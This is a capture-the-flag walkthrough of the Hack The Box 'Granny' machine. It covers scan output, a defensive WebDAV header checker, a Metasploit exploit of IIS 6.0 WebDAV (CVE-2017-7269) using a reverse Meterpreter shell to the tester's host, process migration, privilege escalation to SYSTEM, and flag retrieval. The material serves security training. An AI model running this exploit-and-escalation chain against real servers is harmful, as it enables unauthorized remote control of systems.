HTB Granny

$nmap -T4 -A -sV -p- 10.10.10.15

Starting Nmap 7.80 ( https://nmap.org ) at 2020-07-20 10:57 CEST
Nmap scan report for 10.10.10.15
Host is up (0.044s latency).
Not shown: 65534 filtered ports
PORT   STATE SERVICE VERSION
80/tcp open  http    Microsoft IIS httpd 6.0
| http-methods: 
|_  Potentially risky methods: TRACE DELETE COPY MOVE PROPFIND PROPPATCH SEARCH MKCOL LOCK UNLOCK PUT
|_http-server-header: Microsoft-IIS/6.0
|_http-title: Under Construction
| http-webdav-scan: 
|   Allowed Methods: OPTIONS, TRACE, GET, HEAD, DELETE, COPY, MOVE, PROPFIND, PROPPATCH, SEARCH, MKCOL, LOCK, UNLOCK
|   Server Type: Microsoft-IIS/6.0
|   WebDAV type: Unknown
|   Server Date: Mon, 20 Jul 2020 08:59:32 GMT
|_  Public Options: OPTIONS, TRACE, GET, HEAD, DELETE, PUT, POST, COPY, MOVE, MKCOL, PROPFIND, PROPPATCH, LOCK, UNLOCK, SEARCH
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 108.16 seconds

$nmap -p 80 --script vuln 10.10.10.15

Starting Nmap 7.80 ( https://nmap.org ) at 2020-07-20 11:00 CEST
Pre-scan script results:
| broadcast-avahi-dos: 
|   Discovered hosts:
|     224.0.0.251
|   After NULL UDP avahi packet DoS (CVE-2011-1002).
|_  Hosts are all up (not vulnerable).
Nmap scan report for 10.10.10.15
Host is up (0.043s latency).

PORT   STATE SERVICE
80/tcp open  http
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
|_http-csrf: Couldn't find any CSRF vulnerabilities.
|_http-dombased-xss: Couldn't find any DOM based XSS.
| http-enum: 
|   /_vti_bin/: Frontpage file or folder
|   /_vti_log/: Frontpage file or folder
|   /postinfo.html: Frontpage file or folder
|   /_vti_bin/_vti_aut/author.dll: Frontpage file or folder
|   /_vti_bin/_vti_aut/author.exe: Frontpage file or folder
|   /_vti_bin/_vti_adm/admin.dll: Frontpage file or folder
|   /_vti_bin/_vti_adm/admin.exe: Frontpage file or folder
|   /_vti_bin/fpcount.exe?Page=default.asp|Image=3: Frontpage file or folder
|   /_vti_bin/shtml.dll: Frontpage file or folder
|   /_vti_bin/shtml.exe: Frontpage file or folder
|   /images/: Potentially interesting folder
|_  /_private/: Potentially interesting folder
| http-frontpage-login: 
|   VULNERABLE:
|   Frontpage extension anonymous login
|     State: VULNERABLE
|       Default installations of older versions of frontpage extensions allow anonymous logins which can lead to server compromise.
|       
|     References:
|_      http://insecure.org/sploits/Microsoft.frontpage.insecurities.html
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.

Nmap done: 1 IP address (1 host up) scanned in 224.91 seconds

$gobuster dir -u 10.10.10.15 -w /usr/share/wordlists/dirb/common.txt -e

===============================================================
Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
===============================================================
[+] Url:            http://10.10.10.15
[+] Threads:        10
[+] Wordlist:       /usr/share/wordlists/dirb/common.txt
[+] Status codes:   200,204,301,302,307,401,403
[+] User Agent:     gobuster/3.0.1
[+] Expanded:       true
[+] Timeout:        10s
===============================================================
2020/07/20 11:06:45 Starting gobuster
===============================================================
http://10.10.10.15/_private (Status: 301)
http://10.10.10.15/_vti_bin (Status: 301)
http://10.10.10.15/_vti_bin/_vti_aut/author.dll (Status: 200)
http://10.10.10.15/_vti_bin/_vti_adm/admin.dll (Status: 200)
http://10.10.10.15/_vti_bin/shtml.dll (Status: 200)
http://10.10.10.15/_vti_log (Status: 301)
http://10.10.10.15/aspnet_client (Status: 301)
http://10.10.10.15/Images (Status: 301)
http://10.10.10.15/images (Status: 301)
===============================================================
2020/07/20 11:07:10 Finished
===============================================================

$nikto -h 10.10.10.15

- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP:          10.10.10.15
+ Target Hostname:    10.10.10.15
+ Target Port:        80
+ Start Time:         2020-07-20 11:08:54 (GMT2)
---------------------------------------------------------------------------
+ Server: Microsoft-IIS/6.0
+ Retrieved microsoftofficewebserver header: 5.0_Pub
+ Retrieved x-powered-by header: ASP.NET
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ Uncommon header 'microsoftofficewebserver' found, with contents: 5.0_Pub
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ Retrieved x-aspnet-version header: 1.1.4322
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ OSVDB-397: HTTP method 'PUT' allows clients to save files on the web server.
+ OSVDB-5646: HTTP method 'DELETE' allows clients to delete files on the web server.
+ Retrieved dasl header: <DAV:sql>
+ Retrieved dav header: 1, 2
+ Retrieved ms-author-via header: MS-FP/4.0,DAV
+ Uncommon header 'ms-author-via' found, with contents: MS-FP/4.0,DAV
+ Allowed HTTP Methods: OPTIONS, TRACE, GET, HEAD, DELETE, PUT, POST, COPY, MOVE, MKCOL, PROPFIND, PROPPATCH, LOCK, UNLOCK, SEARCH 
+ OSVDB-5646: HTTP method ('Allow' Header): 'DELETE' may allow clients to remove files on the web server.
+ OSVDB-397: HTTP method ('Allow' Header): 'PUT' method could allow clients to save files on the web server.
+ OSVDB-5647: HTTP method ('Allow' Header): 'MOVE' may allow clients to change file locations on the web server.
+ Public HTTP Methods: OPTIONS, TRACE, GET, HEAD, DELETE, PUT, POST, COPY, MOVE, MKCOL, PROPFIND, PROPPATCH, LOCK, UNLOCK, SEARCH 
+ OSVDB-5646: HTTP method ('Public' Header): 'DELETE' may allow clients to remove files on the web server.
+ OSVDB-397: HTTP method ('Public' Header): 'PUT' method could allow clients to save files on the web server.
+ OSVDB-5647: HTTP method ('Public' Header): 'MOVE' may allow clients to change file locations on the web server.
+ WebDAV enabled (SEARCH LOCK PROPPATCH MKCOL PROPFIND UNLOCK COPY listed as allowed)
+ OSVDB-13431: PROPFIND HTTP verb may show the server's internal IP address: http://granny/_vti_bin/_vti_aut/author.dll
+ OSVDB-396: /_vti_bin/shtml.exe: Attackers may be able to crash FrontPage by requesting a DOS device, like shtml.exe/aux.htm -- a DoS was not attempted.
+ OSVDB-3233: /postinfo.html: Microsoft FrontPage default file found.
+ OSVDB-3233: /_private/: FrontPage directory found.
+ OSVDB-3233: /_vti_bin/: FrontPage directory found.
+ OSVDB-3233: /_vti_inf.html: FrontPage/SharePoint is installed and reveals its version number (check HTML source for more information).
+ OSVDB-3300: /_vti_bin/: shtml.exe/shtml.dll is available remotely. Some versions of the Front Page ISAPI filter are vulnerable to a DOS (not attempted).
+ OSVDB-3500: /_vti_bin/fpcount.exe: Frontpage counter CGI has been found. FP Server version 97 allows remote users to execute arbitrary system commands, though a vulnerability in this version could not be confirmed. http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-1999-1376. http://www.securityfocus.com/bid/2252.
+ OSVDB-67: /_vti_bin/shtml.dll/_vti_rpc: The anonymous FrontPage user is revealed through a crafted POST.
+ /_vti_bin/_vti_adm/admin.dll: FrontPage/SharePoint file found.
+ 8018 requests: 0 error(s) and 32 item(s) reported on remote host
+ End Time:           2020-07-20 11:16:31 (GMT2) (457 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested
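As an added example (not part of the original write-up), a small Python checker that reads the response headers nikto and nmap reported above and flags what a defender would want to fix: WebDAV advertised through the dav / ms-author-via headers, the state-changing methods (PUT, DELETE, COPY, MOVE, MKCOL, PROPPATCH) listed in Allow and Public, and the IIS 6.0 plus WebDAV combination this box is exploited through. The sample OPTIONS response is constructed from the values on this page, not a live capture.

```python
"""Flag risky WebDAV exposure from an HTTP OPTIONS response.

Added example for the Granny write-up; the sample response below is
constructed from the headers nikto/nmap reported, not a live capture.
"""
from __future__ import annotations

# Methods that let an unauthenticated client create, move or delete content.
STATE_CHANGING = {"PUT", "DELETE", "COPY", "MOVE", "MKCOL", "PROPPATCH"}

# Constructed OPTIONS response mirroring the headers seen on 10.10.10.15.
SAMPLE_OPTIONS_RESPONSE = (
    "HTTP/1.1 200 OK\r\n"
    "Server: Microsoft-IIS/6.0\r\n"
    "MicrosoftOfficeWebServer: 5.0_Pub\r\n"
    "X-Powered-By: ASP.NET\r\n"
    "DASL: <DAV:sql>\r\n"
    "DAV: 1, 2\r\n"
    "MS-Author-Via: MS-FP/4.0,DAV\r\n"
    "Allow: OPTIONS, TRACE, GET, HEAD, DELETE, PUT, POST, COPY, MOVE, MKCOL, "
    "PROPFIND, PROPPATCH, LOCK, UNLOCK, SEARCH\r\n"
    "Public: OPTIONS, TRACE, GET, HEAD, DELETE, PUT, POST, COPY, MOVE, MKCOL, "
    "PROPFIND, PROPPATCH, LOCK, UNLOCK, SEARCH\r\n"
    "Content-Length: 0\r\n"
    "\r\n"
)


def parse_headers(raw: str) -> dict[str, str]:
    """Parse a raw HTTP response into a lower-cased header dict (status line dropped)."""
    head = raw.split("\r\n\r\n", 1)[0]
    headers: dict[str, str] = {}
    for line in head.split("\r\n")[1:]:
        if ":" in line:
            name, value = line.split(":", 1)
            headers[name.strip().lower()] = value.strip()
    return headers


def methods_in(headers: dict[str, str], name: str) -> set[str]:
    """Return the method tokens listed in a comma-separated header such as Allow or Public."""
    return {m.strip().upper() for m in headers.get(name, "").split(",") if m.strip()}


def assess_webdav(raw: str) -> dict:
    """Summarise exposure: is DAV advertised, which risky methods are open, is IIS 6.0 in play."""
    h = parse_headers(raw)
    webdav_on = "dav" in h or "DAV" in h.get("ms-author-via", "").upper()
    exposed = (methods_in(h, "allow") | methods_in(h, "public")) & STATE_CHANGING
    return {
        "server": h.get("server", ""),
        "webdav_advertised": webdav_on,
        "risky_methods": sorted(exposed),
        # IIS 6.0 with WebDAV enabled is the combination this write-up exploits (CVE-2017-7269).
        "iis6_webdav": webdav_on and h.get("server", "") == "Microsoft-IIS/6.0",
    }
```

Disabling WebDAV (or at least PUT/DELETE/MOVE/COPY/MKCOL/PROPPATCH for anonymous users) on the IIS 6.0 host would make this check come back clean.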

Based on the vulnerability used on Grandpa (CVE-2017-7269), search Metasploit for the matching module:

msf5 > search CVE-2017-7269

Matching Modules
================

   #  Name                                                 Disclosure Date  Rank    Check  Description
   -  ----                                                 ---------------  ----    -----  -----------
   0  exploit/windows/iis/iis_webdav_scstoragepathfromurl  2017-03-26       manual  Yes    Microsoft IIS WebDav ScStoragePathFromUrl Overflow

msf5 >

msf5 > use 0

[*] No payload configured, defaulting to windows/meterpreter/reverse_tcp

msf5 exploit(windows/iis/iis_webdav_scstoragepathfromurl) > options

Module options (exploit/windows/iis/iis_webdav_scstoragepathfromurl):

   Name           Current Setting  Required  Description
   ----           ---------------  --------  -----------
   MAXPATHLENGTH  60               yes       End of physical path brute force
   MINPATHLENGTH  3                yes       Start of physical path brute force
   Proxies                         no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS                          yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
   RPORT          80               yes       The target port (TCP)
   SSL            false            no        Negotiate SSL/TLS for outgoing connections
   TARGETURI      /                yes       Path of IIS 6 web application
   VHOST                           no        HTTP server virtual host

Payload options (windows/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  process          yes       Exit technique (Accepted: '', seh, thread, process, none)
   LHOST     192.168.10.131   yes       The listen address (an interface may be specified)
   LPORT     4444             yes       The listen port

Exploit target:

   Id  Name
   --  ----
   0   Microsoft Windows Server 2003 R2 SP2 x86

msf5 exploit(windows/iis/iis_webdav_scstoragepathfromurl) > set rhosts 10.10.10.15
msf5 exploit(windows/iis/iis_webdav_scstoragepathfromurl) > set lhost 10.10.14.8
msf5 exploit(windows/iis/iis_webdav_scstoragepathfromurl) > run

[*] Started reverse TCP handler on 10.10.14.8:4444 
[*] Trying path length 3 to 60 ...
[*] Sending stage (176195 bytes) to 10.10.10.15
[*] Meterpreter session 1 opened (10.10.14.8:4444 -> 10.10.10.15:1030) at 2020-07-20 11:24:29 +0200

meterpreter >

meterpreter > getuid

[-] stdapi_sys_config_getuid: Operation failed: Access is denied.

meterpreter > shell

[-] Failed to spawn shell with thread impersonation. Retrying without it.
Process 3272 created.
Channel 2 created.
Microsoft Windows [Version 5.2.3790]
(C) Copyright 1985-2003 Microsoft Corp.

c:\windows\system32\inetsrv>whoami

whoami
nt authority\network service

c:\windows\system32\inetsrv>

meterpreter > run post/multi/recon/local_exploit_suggester 

[*] 10.10.10.15 - Collecting local exploits for x86/windows...
[*] 10.10.10.15 - 34 exploit checks are being tried...
nil versions are discouraged and will be deprecated in Rubygems 4
[+] 10.10.10.15 - exploit/windows/local/ms10_015_kitrap0d: The service is running, but could not be validated.
[+] 10.10.10.15 - exploit/windows/local/ms14_058_track_popup_menu: The target appears to be vulnerable.
[+] 10.10.10.15 - exploit/windows/local/ms14_070_tcpip_ioctl: The target appears to be vulnerable.
[+] 10.10.10.15 - exploit/windows/local/ms15_051_client_copy_image: The target appears to be vulnerable.
[+] 10.10.10.15 - exploit/windows/local/ms16_016_webdav: The service is running, but could not be validated.
[+] 10.10.10.15 - exploit/windows/local/ppr_flatten_rec: The target appears to be vulnerable.
meterpreter > 

meterpreter > getpid

Current pid: 3112

meterpreter > ps

Process List
============

 PID   PPID  Name               Arch  Session  User                          Path
 ---   ----  ----               ----  -------  ----                          ----
 0     0     [System Process]                                                
 4     0     System                                                          
 140   1084  cidaemon.exe                                                    
 272   4     smss.exe                                                        
 324   272   csrss.exe                                                       
 348   272   winlogon.exe                                                    
 396   348   services.exe                                                    
 408   348   lsass.exe                                                       
 588   396   svchost.exe                                                     
 680   396   svchost.exe                                                     
 732   1084  cidaemon.exe                                                    
 736   396   svchost.exe                                                     
 764   396   svchost.exe                                                     
 800   396   svchost.exe                                                     
 924   1084  cidaemon.exe                                                    
 936   396   spoolsv.exe                                                     
 964   396   msdtc.exe                                                       
 1084  396   cisvc.exe                                                       
 1124  396   svchost.exe                                                     
 1172  396   inetinfo.exe                                                    
 1216  396   svchost.exe                                                     
 1340  396   VGAuthService.exe                                               
 1400  396   vmtoolsd.exe                                                    
 1456  396   svchost.exe                                                     
 1596  396   svchost.exe                                                     
 1704  396   alg.exe                                                         
 1824  588   wmiprvse.exe       x86   0        NT AUTHORITY\NETWORK SERVICE  C:\WINDOWS\system32\wbem\wmiprvse.exe
 1908  396   dllhost.exe                                                     
 2268  3112  cmd.exe            x86   0        NT AUTHORITY\NETWORK SERVICE  C:\WINDOWS\system32\cmd.exe
 2308  588   wmiprvse.exe                                                    
 2472  588   davcdata.exe                                                    
 2492  348   logon.scr                                                       
 3112  3452  rundll32.exe       x86   0                                      C:\WINDOWS\system32\rundll32.exe
 3452  1456  w3wp.exe           x86   0        NT AUTHORITY\NETWORK SERVICE  c:\windows\system32\inetsrv\w3wp.exe
 3524  588   davcdata.exe       x86   0        NT AUTHORITY\NETWORK SERVICE  C:\WINDOWS\system32\inetsrv\davcdata.exe
 3936  1456  w3wp.exe                                                        

meterpreter > 

Again, migrate into a process that runs as NETWORK SERVICE: wmiprvse.exe, PID 1824 in the list above.

meterpreter > migrate 1824

[*] Migrating from 3112 to 1824...
[*] Migration completed successfully.

meterpreter > getuid

Server username: NT AUTHORITY\NETWORK SERVICE
meterpreter > 

meterpreter > background 

[*] Backgrounding session 1...

msf5 exploit(windows/iis/iis_webdav_scstoragepathfromurl) > use ms14_058_track_popup_menu

[*] No payload configured, defaulting to windows/meterpreter/reverse_tcp

Matching Modules
================

   #  Name                                             Disclosure Date  Rank    Check  Description
   -  ----                                             ---------------  ----    -----  -----------
   0  exploit/windows/local/ms14_058_track_popup_menu  2014-10-14       normal  Yes    Windows TrackPopupMenu Win32k NULL Pointer Dereference

[*] Using exploit/windows/local/ms14_058_track_popup_menu

msf5 exploit(windows/local/ms14_058_track_popup_menu) > options 

Module options (exploit/windows/local/ms14_058_track_popup_menu):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   SESSION                   yes       The session to run this module on.

Payload options (windows/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  thread           yes       Exit technique (Accepted: '', seh, thread, process, none)
   LHOST     192.168.10.131   yes       The listen address (an interface may be specified)
   LPORT     4444             yes       The listen port

Exploit target:

   Id  Name
   --  ----
   0   Windows x86

msf5 exploit(windows/local/ms14_058_track_popup_menu) > set session 1
msf5 exploit(windows/local/ms14_058_track_popup_menu) > set lhost 10.10.14.8
msf5 exploit(windows/local/ms14_058_track_popup_menu) > run

[*] Started reverse TCP handler on 10.10.14.8:4444 
[*] Launching notepad to host the exploit...
[+] Process 3664 launched.
[*] Reflectively injecting the exploit DLL into 3664...
[*] Injecting exploit into 3664...
[*] Exploit injected. Injecting payload into 3664...
[*] Payload injected. Executing exploit...
[+] Exploit finished, wait for (hopefully privileged) payload execution to complete.
[*] Sending stage (176195 bytes) to 10.10.10.15
[*] Meterpreter session 2 opened (10.10.14.8:4444 -> 10.10.10.15:1031) at 2020-07-22 20:29:42 +0200

meterpreter > 

meterpreter > getuid

Server username: NT AUTHORITY\SYSTEM
meterpreter > 

meterpreter > ls

Listing: C:\Documents and Settings
==================================

Mode             Size  Type  Last modified              Name
----             ----  ----  -------------              ----
40777/rwxrwxrwx  0     dir   2017-04-12 16:12:15 +0200  Administrator
40777/rwxrwxrwx  0     dir   2017-04-12 15:42:38 +0200  All Users
40777/rwxrwxrwx  0     dir   2017-04-12 15:42:38 +0200  Default User
40777/rwxrwxrwx  0     dir   2017-04-12 21:19:46 +0200  Lakis
40777/rwxrwxrwx  0     dir   2017-04-12 16:08:32 +0200  LocalService
40777/rwxrwxrwx  0     dir   2017-04-12 16:08:31 +0200  NetworkService

meterpreter > 

meterpreter > cd Lakis
meterpreter > cd Desktop 
meterpreter > cat user.txt 

700cXXXXXXXXXXXXXXXXXXXXXXXXXXXX

meterpreter > cd Administrator 
meterpreter > cd Desktop 
meterpreter > cat root.txt 

aa4bXXXXXXXXXXXXXXXXXXXXXXXXXXXX
